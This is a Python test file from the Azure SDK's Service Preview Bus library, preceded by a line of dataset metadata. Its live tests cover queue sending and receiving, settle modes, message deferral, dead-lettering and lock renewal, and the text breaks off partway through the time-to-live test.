| 32.288288 | 64 | 0.328683 | 193 | 3,584 | 5.735751 | 0.227979 | 0.352304 | 0.379404 | 0.227642 | 0.719061 | 0.719061 | 0.70822 | 0.70822 | 0.70822 | 0.70822 | 0 | 0.00899 | 0.59654 | 3,584 | 110 | 65 | 32.581818 | 0.75657 | 0 | 0 | 0.787037 | 0 | 0 | 0.228237 | 0.066964 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.018519 | 0 | 0.018519 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
e517f40edb279457226b92e1cb826a89f7236114 | 56,916 | py | Python | sdk/servicebus/azure-servicebus/tests/test_queues.py | anuchandy/azure-sdk-for-python | 589b9890554ebf261aa2184e8f1c6507f01a207c | [
"MIT"
] | null | null | null | sdk/servicebus/azure-servicebus/tests/test_queues.py | anuchandy/azure-sdk-for-python | 589b9890554ebf261aa2184e8f1c6507f01a207c | [
"MIT"
] | null | null | null | sdk/servicebus/azure-servicebus/tests/test_queues.py | anuchandy/azure-sdk-for-python | 589b9890554ebf261aa2184e8f1c6507f01a207c | [
"MIT"
] | null | null | null | #-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
import logging
import sys
import os
import pytest
import time
import uuid
from datetime import datetime, timedelta
from azure.servicebus import ServiceBusClient, QueueClient, AutoLockRenew
from azure.servicebus.common.message import Message, PeekMessage, BatchMessage, DeferredMessage
from azure.servicebus.common.constants import ReceiveSettleMode
from azure.servicebus.common.errors import (
ServiceBusError,
MessageLockExpired,
InvalidHandlerState,
MessageAlreadySettled,
AutoLockRenewTimeout,
MessageSendFailed,
MessageSettleFailed)
from devtools_testutils import AzureMgmtTestCase, RandomNameResourceGroupPreparer
from servicebus_preparer import ServiceBusNamespacePreparer, ServiceBusTopicPreparer, ServiceBusQueuePreparer
def get_logger(level):
    azure_logger = logging.getLogger("azure")
    uamqp_logger = logging.getLogger("uamqp")
    # Create the handler once and attach it to whichever logger still lacks
    # one, so it is always defined no matter which branch runs.
    handler = logging.StreamHandler(stream=sys.stdout)
    handler.setFormatter(logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s'))
    if not azure_logger.handlers:
        azure_logger.setLevel(level)
        azure_logger.addHandler(handler)
    if not uamqp_logger.handlers:
        uamqp_logger.setLevel(logging.INFO)
        uamqp_logger.addHandler(handler)
    return azure_logger
_logger = get_logger(logging.DEBUG)
def print_message(message):
_logger.info("Receiving: {}".format(message))
_logger.debug("Time to live: {}".format(message.time_to_live))
_logger.debug("Sequence number: {}".format(message.sequence_number))
_logger.debug("Enqueue Sequence numger: {}".format(message.enqueue_sequence_number))
_logger.debug("Partition ID: {}".format(message.partition_id))
_logger.debug("Partition Key: {}".format(message.partition_key))
_logger.debug("User Properties: {}".format(message.user_properties))
_logger.debug("Annotations: {}".format(message.annotations))
_logger.debug("Delivery count: {}".format(message.header.delivery_count))
try:
_logger.debug("Locked until: {}".format(message.locked_until))
_logger.debug("Lock Token: {}".format(message.lock_token))
except TypeError:
pass
_logger.debug("Enqueued time: {}".format(message.enqueued_time))
# A note regarding live_test_only.
# Old servicebus tests were not written to work on both stubs and live entities.
# This disables those tests for non-live scenarios, and should be removed as tests
# are ported to offline-compatible code.
class ServiceBusQueueTests(AzureMgmtTestCase):
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer()
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_github_issue_7079(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs):
sb_client = ServiceBusClient.from_connection_string(
servicebus_namespace_connection_string, debug=False)
queue = sb_client.get_queue(servicebus_queue.name)
with queue.get_sender() as sender:
for i in range(5):
sender.send(Message("Message {}".format(i)))
messages = queue.get_receiver(mode=ReceiveSettleMode.ReceiveAndDelete, idle_timeout=5)
batch = messages.fetch_next()
count = len(batch)
messages.reconnect()
for message in messages:
_logger.debug(message)
count += 1
assert count == 5
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer()
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_github_issue_6178(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs):
sb_client = ServiceBusClient.from_connection_string(
servicebus_namespace_connection_string, debug=False)
queue = sb_client.get_queue(servicebus_queue.name)
for i in range(3):
queue.send(Message("Message {}".format(i)))
messages = queue.get_receiver(idle_timeout=60)
for message in messages:
_logger.debug(message)
_logger.debug(message.sequence_number)
_logger.debug(message.enqueued_time)
_logger.debug(message.expired)
message.complete()
time.sleep(40)
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_by_queue_client_conn_str_receive_handler_peeklock(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs):
queue_client = QueueClient.from_connection_string(
servicebus_namespace_connection_string,
name=servicebus_queue.name,
debug=False)
with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Handler message no. {}".format(i))
message.enqueue_sequence_number = i
sender.send(message)
receiver = queue_client.get_receiver(idle_timeout=5)
count = 0
for message in receiver:
print_message(message)
assert message.message.delivery_tag is not None
assert message.lock_token == message.message.delivery_annotations.get(message._x_OPT_LOCK_TOKEN)
assert message.lock_token == uuid.UUID(bytes_le=message.message.delivery_tag)
count += 1
message.complete()
assert count == 10
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_by_queue_client_conn_str_receive_handler_receiveanddelete(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs):
queue_client = QueueClient.from_connection_string(
servicebus_namespace_connection_string,
name=servicebus_queue.name,
debug=False)
with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Handler message no. {}".format(i))
message.enqueue_sequence_number = i
sender.send(message)
messages = []
receiver = queue_client.get_receiver(mode=ReceiveSettleMode.ReceiveAndDelete, idle_timeout=5)
for message in receiver:
messages.append(message)
with pytest.raises(MessageAlreadySettled):
message.complete()
assert not receiver.running
assert len(messages) == 10
time.sleep(30)
messages = []
receiver = queue_client.get_receiver(mode=ReceiveSettleMode.ReceiveAndDelete, idle_timeout=5)
for message in receiver:
messages.append(message)
assert len(messages) == 0
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_by_queue_client_conn_str_receive_handler_with_stop(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs):
queue_client = QueueClient.from_connection_string(
servicebus_namespace_connection_string,
name=servicebus_queue.name,
debug=False)
with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Stop message no. {}".format(i))
sender.send(message)
messages = []
receiver = queue_client.get_receiver(idle_timeout=5)
for message in receiver:
messages.append(message)
message.complete()
if len(messages) >= 5:
break
assert receiver.running
assert len(messages) == 5
with receiver:
for message in receiver:
messages.append(message)
message.complete()
if len(messages) >= 5:
break
assert not receiver.running
assert len(messages) == 6
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_by_servicebus_client_iter_messages_simple(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
client = ServiceBusClient(
service_namespace=servicebus_namespace.name,
shared_access_key_name=servicebus_namespace_key_name,
shared_access_key_value=servicebus_namespace_primary_key,
debug=False)
queue_client = client.get_queue(servicebus_queue.name)
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Iter message no. {}".format(i))
sender.send(message)
count = 0
for message in receiver:
print_message(message)
message.complete()
with pytest.raises(MessageAlreadySettled):
message.complete()
with pytest.raises(MessageAlreadySettled):
message.renew_lock()
count += 1
with pytest.raises(InvalidHandlerState):
next(receiver)
assert count == 10
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_by_servicebus_conn_str_client_iter_messages_with_abandon(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs):
client = ServiceBusClient.from_connection_string(servicebus_namespace_connection_string, debug=False)
queue_client = client.get_queue(servicebus_queue.name)
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Abandoned message no. {}".format(i))
sender.send(message)
count = 0
for message in receiver:
print_message(message)
if not message.header.delivery_count:
count += 1
message.abandon()
else:
assert message.header.delivery_count == 1
message.complete()
assert count == 10
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
count = 0
for message in receiver:
print_message(message)
message.complete()
count += 1
assert count == 0
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_by_servicebus_client_iter_messages_with_defer(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
client = ServiceBusClient(
service_namespace=servicebus_namespace.name,
shared_access_key_name=servicebus_namespace_key_name,
shared_access_key_value=servicebus_namespace_primary_key,
debug=False)
queue_client = client.get_queue(servicebus_queue.name)
deferred_messages = []
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Deferred message no. {}".format(i))
sender.send(message)
count = 0
for message in receiver:
deferred_messages.append(message.sequence_number)
print_message(message)
count += 1
message.defer()
assert count == 10
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
count = 0
for message in receiver:
print_message(message)
message.complete()
count += 1
assert count == 0
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_by_servicebus_client_iter_messages_with_retrieve_deferred_client(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
client = ServiceBusClient(
service_namespace=servicebus_namespace.name,
shared_access_key_name=servicebus_namespace_key_name,
shared_access_key_value=servicebus_namespace_primary_key,
debug=False)
queue_client = client.get_queue(servicebus_queue.name)
deferred_messages = []
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Deferred message no. {}".format(i))
sender.send(message)
count = 0
for message in receiver:
deferred_messages.append(message.sequence_number)
print_message(message)
count += 1
message.defer()
assert count == 10
deferred = queue_client.receive_deferred_messages(deferred_messages, mode=ReceiveSettleMode.PeekLock)
assert len(deferred) == 10
for message in deferred:
assert isinstance(message, DeferredMessage)
with pytest.raises(ValueError):
message.complete()
with pytest.raises(ValueError):
queue_client.settle_deferred_messages('foo', deferred)
queue_client.settle_deferred_messages('completed', deferred)
with pytest.raises(ServiceBusError):
queue_client.receive_deferred_messages(deferred_messages)
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_by_servicebus_client_iter_messages_with_retrieve_deferred_receiver_complete(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
client = ServiceBusClient(
service_namespace=servicebus_namespace.name,
shared_access_key_name=servicebus_namespace_key_name,
shared_access_key_value=servicebus_namespace_primary_key,
debug=False)
queue_client = client.get_queue(servicebus_queue.name)
deferred_messages = []
messages = [Message("Deferred message no. {}".format(i)) for i in range(10)]
results = queue_client.send(messages, session="test_session")
assert all(result[0] for result in results)
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
count = 0
for message in receiver:
deferred_messages.append(message.sequence_number)
print_message(message)
count += 1
message.defer()
assert count == 10
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
deferred = receiver.receive_deferred_messages(deferred_messages)
assert len(deferred) == 10
for message in deferred:
assert isinstance(message, DeferredMessage)
assert message.lock_token
assert message.locked_until
assert message._receiver
message.renew_lock()
message.complete()
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_by_servicebus_client_iter_messages_with_retrieve_deferred_receiver_deadletter(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
client = ServiceBusClient(
service_namespace=servicebus_namespace.name,
shared_access_key_name=servicebus_namespace_key_name,
shared_access_key_value=servicebus_namespace_primary_key,
debug=False)
queue_client = client.get_queue(servicebus_queue.name)
deferred_messages = []
messages = [Message("Deferred message no. {}".format(i)) for i in range(10)]
results = queue_client.send(messages)
assert all(result[0] for result in results)
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
count = 0
for message in receiver:
deferred_messages.append(message.sequence_number)
print_message(message)
count += 1
message.defer()
assert count == 10
with queue_client.get_receiver(idle_timeout=5) as session:
deferred = session.receive_deferred_messages(deferred_messages)
assert len(deferred) == 10
for message in deferred:
assert isinstance(message, DeferredMessage)
message.dead_letter("something")
count = 0
with queue_client.get_deadletter_receiver(idle_timeout=5) as receiver:
for message in receiver:
count += 1
print_message(message)
assert message.user_properties[b'DeadLetterReason'] == b'something'
assert message.user_properties[b'DeadLetterErrorDescription'] == b'something'
message.complete()
assert count == 10
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_by_servicebus_client_iter_messages_with_retrieve_deferred_receiver_deletemode(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
client = ServiceBusClient(
service_namespace=servicebus_namespace.name,
shared_access_key_name=servicebus_namespace_key_name,
shared_access_key_value=servicebus_namespace_primary_key,
debug=False)
queue_client = client.get_queue(servicebus_queue.name)
deferred_messages = []
messages = [Message("Deferred message no. {}".format(i)) for i in range(10)]
results = queue_client.send(messages)
assert all(result[0] for result in results)
count = 0
receiver = queue_client.get_receiver(idle_timeout=5)
for message in receiver:
deferred_messages.append(message.sequence_number)
print_message(message)
count += 1
message.defer()
assert count == 10
with queue_client.get_receiver(idle_timeout=5) as receiver:
deferred = receiver.receive_deferred_messages(deferred_messages, mode=ReceiveSettleMode.ReceiveAndDelete)
assert len(deferred) == 10
for message in deferred:
assert isinstance(message, DeferredMessage)
with pytest.raises(MessageAlreadySettled):
message.complete()
with pytest.raises(ServiceBusError):
deferred = receiver.receive_deferred_messages(deferred_messages)
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_by_servicebus_client_iter_messages_with_retrieve_deferred_not_found(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
client = ServiceBusClient(
service_namespace=servicebus_namespace.name,
shared_access_key_name=servicebus_namespace_key_name,
shared_access_key_value=servicebus_namespace_primary_key,
debug=False)
queue_client = client.get_queue(servicebus_queue.name)
deferred_messages = []
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
with queue_client.get_sender() as sender:
for i in range(3):
message = Message("Deferred message no. {}".format(i))
sender.send(message)
count = 0
for message in receiver:
deferred_messages.append(message.sequence_number)
print_message(message)
count += 1
message.defer()
assert count == 3
with pytest.raises(ServiceBusError):
deferred = queue_client.receive_deferred_messages([3, 4], mode=ReceiveSettleMode.PeekLock)
with pytest.raises(ServiceBusError):
deferred = queue_client.receive_deferred_messages([5, 6, 7], mode=ReceiveSettleMode.PeekLock)
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_by_servicebus_client_receive_batch_with_deadletter(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
client = ServiceBusClient(
service_namespace=servicebus_namespace.name,
shared_access_key_name=servicebus_namespace_key_name,
shared_access_key_value=servicebus_namespace_primary_key,
debug=False)
queue_client = client.get_queue(servicebus_queue.name)
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock, prefetch=10) as receiver:
with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Dead lettered message no. {}".format(i))
sender.send(message)
count = 0
messages = receiver.fetch_next()
while messages:
for message in messages:
print_message(message)
count += 1
message.dead_letter(description="Testing")
messages = receiver.fetch_next()
assert count == 10
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
count = 0
for message in receiver:
print_message(message)
message.complete()
count += 1
assert count == 0
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_by_servicebus_client_receive_batch_with_retrieve_deadletter(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
client = ServiceBusClient(
service_namespace=servicebus_namespace.name,
shared_access_key_name=servicebus_namespace_key_name,
shared_access_key_value=servicebus_namespace_primary_key,
debug=False)
queue_client = client.get_queue(servicebus_queue.name)
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock, prefetch=10) as receiver:
with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Dead lettered message no. {}".format(i))
sender.send(message)
count = 0
messages = receiver.fetch_next()
while messages:
for message in messages:
print_message(message)
message.dead_letter(description="Testing queue deadletter")
count += 1
messages = receiver.fetch_next()
with pytest.raises(InvalidHandlerState):
receiver.fetch_next()
assert count == 10
with queue_client.get_deadletter_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
count = 0
for message in receiver:
print_message(message)
message.complete()
count += 1
assert count == 10
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_by_servicebus_client_session_fail(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
client = ServiceBusClient(
service_namespace=servicebus_namespace.name,
shared_access_key_name=servicebus_namespace_key_name,
shared_access_key_value=servicebus_namespace_primary_key,
debug=False)
queue_client = client.get_queue(servicebus_queue.name)
with pytest.raises(ValueError):
queue_client.get_receiver(session="test")
with queue_client.get_sender(session="test") as sender:
sender.send(Message("test session sender"))
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_by_servicebus_client_browse_messages_client(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
client = ServiceBusClient(
service_namespace=servicebus_namespace.name,
shared_access_key_name=servicebus_namespace_key_name,
shared_access_key_value=servicebus_namespace_primary_key,
debug=False)
queue_client = client.get_queue(servicebus_queue.name)
with queue_client.get_sender() as sender:
for i in range(5):
message = Message("Test message no. {}".format(i))
sender.send(message)
messages = queue_client.peek(5)
assert len(messages) == 5
assert all(isinstance(m, PeekMessage) for m in messages)
for message in messages:
print_message(message)
with pytest.raises(TypeError):
message.complete()
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_by_servicebus_client_browse_messages_with_receiver(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
client = ServiceBusClient(
service_namespace=servicebus_namespace.name,
shared_access_key_name=servicebus_namespace_key_name,
shared_access_key_value=servicebus_namespace_primary_key,
debug=False)
queue_client = client.get_queue(servicebus_queue.name)
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
with queue_client.get_sender() as sender:
for i in range(5):
message = Message("Test message no. {}".format(i))
sender.send(message)
messages = receiver.peek(5)
assert len(messages) > 0
assert all(isinstance(m, PeekMessage) for m in messages)
for message in messages:
print_message(message)
with pytest.raises(TypeError):
message.complete()
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_by_servicebus_client_browse_empty_messages(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
client = ServiceBusClient(
service_namespace=servicebus_namespace.name,
shared_access_key_name=servicebus_namespace_key_name,
shared_access_key_value=servicebus_namespace_primary_key,
debug=False)
queue_client = client.get_queue(servicebus_queue.name)
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock, prefetch=10) as receiver:
messages = receiver.peek(10)
assert len(messages) == 0
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_by_servicebus_client_fail_send_messages(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
client = ServiceBusClient(
service_namespace=servicebus_namespace.name,
shared_access_key_name=servicebus_namespace_key_name,
shared_access_key_value=servicebus_namespace_primary_key,
debug=False)
queue_client = client.get_queue(servicebus_queue.name)
too_large = "A" * 1024 * 512
try:
results = queue_client.send(Message(too_large))
except MessageSendFailed:
pytest.skip("Open issue for uAMQP on OSX")
assert len(results) == 1
assert not results[0][0]
assert isinstance(results[0][1], MessageSendFailed)
with queue_client.get_sender() as sender:
with pytest.raises(MessageSendFailed):
sender.send(Message(too_large))
with queue_client.get_sender() as sender:
sender.queue_message(Message(too_large))
results = sender.send_pending_messages()
assert len(results) == 1
assert not results[0][0]
assert isinstance(results[0][1], MessageSendFailed)

    @pytest.mark.liveTest
    @pytest.mark.live_test_only
    @RandomNameResourceGroupPreparer(name_prefix='servicebustest')
    @ServiceBusNamespacePreparer(name_prefix='servicebustest')
    @ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
    def test_queue_by_servicebus_client_fail_send_batch_messages(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
        pytest.skip("TODO: Pending bugfix in uAMQP")

        def batch_data():
            for i in range(3):
                yield str(i) * 1024 * 256

        client = ServiceBusClient(
            service_namespace=servicebus_namespace.name,
            shared_access_key_name=servicebus_namespace_key_name,
            shared_access_key_value=servicebus_namespace_primary_key,
            debug=False)

        queue_client = client.get_queue(servicebus_queue.name)
        results = queue_client.send(BatchMessage(batch_data()))
        assert len(results) == 4
        assert not results[0][0]
        assert isinstance(results[0][1], MessageSendFailed)

        with queue_client.get_sender() as sender:
            with pytest.raises(MessageSendFailed):
                sender.send(BatchMessage(batch_data()))

        with queue_client.get_sender() as sender:
            sender.queue_message(BatchMessage(batch_data()))
            results = sender.send_pending_messages()
            assert len(results) == 4
            assert not results[0][0]
            assert isinstance(results[0][1], MessageSendFailed)

    @pytest.mark.liveTest
    @pytest.mark.live_test_only
    @RandomNameResourceGroupPreparer(name_prefix='servicebustest')
    @ServiceBusNamespacePreparer(name_prefix='servicebustest')
    @ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
    def test_queue_by_servicebus_client_renew_message_locks(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
        client = ServiceBusClient(
            service_namespace=servicebus_namespace.name,
            shared_access_key_name=servicebus_namespace_key_name,
            shared_access_key_value=servicebus_namespace_primary_key,
            debug=False)

        queue_client = client.get_queue(servicebus_queue.name)
        messages = []
        locks = 3
        with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock, prefetch=10) as receiver:
            with queue_client.get_sender() as sender:
                for i in range(locks):
                    message = Message("Test message no. {}".format(i))
                    sender.send(message)

            messages.extend(receiver.fetch_next())
            recv = True
            while recv:
                recv = receiver.fetch_next()
                messages.extend(recv)

            try:
                assert not message.expired
                for m in messages:
                    time.sleep(5)
                    initial_expiry = m.locked_until
                    m.renew_lock()
                    assert (m.locked_until - initial_expiry) >= timedelta(seconds=5)
            finally:
                messages[0].complete()
                messages[1].complete()

                # The 31-second bound reflects the 30-second lock renewal window: asserting at exactly
                # 30 seconds yields flaky "off by .05 seconds" failures caused by network delays and
                # sleeps. A magic number is not ideal, but it keeps the test robust without adding
                # another network hop.
                assert (messages[2].locked_until - datetime.now()) <= timedelta(seconds=31)
                time.sleep((messages[2].locked_until - datetime.now()).total_seconds())
                with pytest.raises(MessageLockExpired):
                    messages[2].complete()

    @pytest.mark.liveTest
    @pytest.mark.live_test_only
    @RandomNameResourceGroupPreparer(name_prefix='servicebustest')
    @ServiceBusNamespacePreparer(name_prefix='servicebustest')
    @ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
    def test_queue_by_queue_client_conn_str_receive_handler_with_autolockrenew(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs):
        queue_client = QueueClient.from_connection_string(
            servicebus_namespace_connection_string,
            name=servicebus_queue.name,
            debug=False)

        with queue_client.get_sender() as sender:
            for i in range(10):
                message = Message("{}".format(i))
                sender.send(message)
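        # AutoLockRenew keeps the first received message's lock alive on a background thread
        # for up to 60 seconds; after that timeout the lock is allowed to expire.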
        renewer = AutoLockRenew()
        messages = []
        with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock, prefetch=10) as receiver:
            for message in receiver:
                if not messages:
                    messages.append(message)
                    assert not message.expired
                    renewer.register(message, timeout=60)
                    print("Registered lock renew thread", message.locked_until, datetime.now())
                    time.sleep(50)
                    print("Finished first sleep", message.locked_until)
                    assert not message.expired
                    time.sleep(25)
                    print("Finished second sleep", message.locked_until, datetime.now())
                    assert message.expired
                    try:
                        message.complete()
                        raise AssertionError("Didn't raise MessageLockExpired")
                    except MessageLockExpired as e:
                        assert isinstance(e.inner_exception, AutoLockRenewTimeout)
                else:
                    if message.expired:
                        print("Remaining messages", message.locked_until, datetime.now())
                        assert message.expired
                        with pytest.raises(MessageLockExpired):
                            message.complete()
                    else:
                        assert message.header.delivery_count >= 1
                        print("Remaining messages", message.locked_until, datetime.now())
                        messages.append(message)
                        message.complete()

        renewer.shutdown()
        assert len(messages) == 11

    @pytest.mark.liveTest
    @pytest.mark.live_test_only
    @RandomNameResourceGroupPreparer(name_prefix='servicebustest')
    @ServiceBusNamespacePreparer(name_prefix='servicebustest')
    @ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
    def test_queue_message_time_to_live(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
        client = ServiceBusClient(
